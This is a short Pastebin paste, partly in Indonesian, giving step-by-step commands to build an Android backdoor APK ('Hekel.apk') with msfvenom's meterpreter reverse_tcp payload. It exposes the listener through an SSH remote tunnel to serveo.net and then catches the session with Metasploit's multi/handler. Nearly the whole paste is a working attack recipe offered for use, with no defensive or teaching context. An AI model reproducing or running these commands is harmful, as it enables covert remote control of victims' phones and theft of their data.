Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ssh -R 1202:localhost:1202 serveo.net
- Cara
- 1. msfvenom -p android/meterpreter/reverse_tcp lhost=serveo.net lport=1202 -o /sdcard/Hekel.apk
- Stlh Mmbuat backdor Lalu Ke Metalsploit
- 1.use exploit/multi/handler
- 2. set payload android/meterpreter/reverse_tcp
- 3. set lhost localhost
- 4. set lport 1202
- 5. run
Add Comment
Please, Sign In to add comment